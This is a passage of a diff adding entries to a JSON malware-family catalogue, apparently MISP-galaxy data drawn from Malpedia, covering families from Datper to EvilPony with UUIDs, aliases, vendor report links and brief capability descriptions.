"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" + ] + }, + "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", + "value": "Datper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", + "value": "DDKONG", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", + "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", + "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", + "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" + ] + }, + "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", + "value": "Decebal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", + "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" + ] + }, + "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", + "value": "Delta(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" + ] + }, + "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", + "value": "Dented", + "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", + "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" + ] + }, + "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", + "value": "DeputyDog", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", + "https://twitter.com/struppigel/status/812601286088597505" + ] + }, + "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", + "value": "DeriaLock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + ] + }, + "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", + "value": "Derusbi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" + ] + }, + "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", + "value": "Devil's Rat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "LusyPOS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", + "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", + "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", + "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", + "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" + ] + }, + "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", + "value": "Dexter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader", + "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users", + "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", + "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware" + ] + }, + "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", + "value": "DE Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crysis", + "Arena" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" + ] + }, + "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", + "value": "Dharma", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crystal", + "Gorynych", + "Gorynch" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", + "https://www.scmagazine.com/inside-diamondfox/article/578478/", + "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", + "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", + "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", + "https://blog.cylance.com/a-study-in-bots-diamondfox" + ] + }, + "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", + "value": "DiamondFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" + ] + }, + "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", + "value": "Dimnie", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", + "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", + "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" + ] + }, + "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", + "value": "DirCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", + "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", + "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html" + ] + }, + "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", + "value": "DistTrack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" + ] + }, + "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", + "value": "DMA Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", + "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", + "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", + "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" + ] + }, + "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", + "value": "DNSMessenger", + "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." + }, + { + "meta": { + "synonyms": [ + "Shelma" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", + "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" + ] + }, + "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", + "value": "DogHousePower", + "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", + "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", + "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", + "https://research.checkpoint.com/dorkbot-an-investigation/" + ] + }, + "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", + "value": "NgrBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", + "value": "Dorshel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", + "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", + "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", + "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" + ] + }, + "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", + "value": "DoublePulsar", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DELPHACY" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + ] + }, + "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", + "value": "Downdelph", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", + "value": "Downeks", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", + "http://www.clearskysec.com/charmingkitten/" + ] + }, + "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", + "value": "DownPaper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" + ] + }, + "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", + "value": "DramNudge", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", + "https://lokalhost.pl/gozi_tree.txt", + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + ] + }, + "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", + "value": "DreamBot", + "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", + "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", + "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", + "https://viql.github.io/dridex/", + "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + ] + }, + "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", + "value": "Dridex", + "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" + ] + }, + "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", + "value": "DROPSHOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" + ] + }, + "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", + "value": "DtBackdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", + "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", + "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", + "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", + "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/" + ] + }, + "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", + "value": "DarkHotel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", + "https://github.com/ch0sys/DUBrute" + ] + }, + "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", + "value": "DUBrute", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" + ] + }, + "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", + "value": "Dumador", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" + ] + }, + "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", + "value": "DuQu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", + "value": "Duuzer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Dyreza" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", + "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", + "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf" + ] + }, + "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", + "value": "Dyre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", + "https://twitter.com/JaromirHorejsi/status/815861135882780673" + ] + }, + "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", + "value": "EDA2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", + "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" + ] + }, + "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", + "value": "EHDevel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", + "value": "Elirks", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", + "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", + "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.joesecurity.org/blog/8409877569366580427" + ] + }, + "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", + "value": "Elise", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", + "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", + "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", + "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html" + ] + }, + "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", + "value": "Emdivi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", + "https://twitter.com/thor_scanner/status/992036762515050496" + ] + }, + "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", + "value": "Empire Downloader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Lurid" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", + "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", + "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", + "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" + ] + }, + "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", + "value": "Enfal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", + "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html", + "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", + "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", + "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + ] + }, + "uuid": "c4490972-3403-4043-9d61-899c0a440940", + "value": "EquationDrug", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", + "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", + "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", + "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", + "https://laanwj.github.io/2016/09/11/buzzdirection.html", + "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html", + "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", + "https://laanwj.github.io/2016/09/01/tadaqueos.html", + "https://laanwj.github.io/2016/08/28/feintcloud.html", + "https://laanwj.github.io/2016/08/22/blatsting.html" + ] + }, + "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", + "value": "Equationgroup (Sorting)", + "description": "Rough collection EQGRP samples, to be sorted" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", + "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" + ] + }, + "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "value": "Erebus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", + "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" + ] + }, + "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", + "value": "Eredel", + "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot" + }, + { + "meta": { + "synonyms": [ + "ExPetr", + "Pnyetya", + "Petna", + "NotPetya", + "Nyetya", + "NonPetya", + "nPetya", + "Diskcoder.C", + "BadRabbit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", + "https://securelist.com/schroedingers-petya/78870/", + "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", + "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", + "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", + "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", + "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", + "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", + "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", + "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", + "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", + "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", + "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", + "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", + "https://securelist.com/bad-rabbit-ransomware/82851/", + "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", + "http://www.intezer.com/notpetya-returns-bad-rabbit/", + "https://www.riskiq.com/blog/labs/badrabbit/", + "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", + "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", + "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", + "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html" + ] + }, + "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", + "value": "EternalPetya", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HighTide" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", + "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", + "value": "EtumBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "https://www.cyphort.com/evilbunny-malware-instrumented-lua/" + ] + }, + "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", + "value": "Evilbunny", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Vidgrab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" + ] + }, + "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", + "value": "EvilGrab", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CREstealer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", + "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", + "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/", + "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/" + ] + }, + "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", + "value": "EvilPony", + "description": "Privately modded version of the Pony stealer." + }, + { + "meta": { + "synonyms": [], 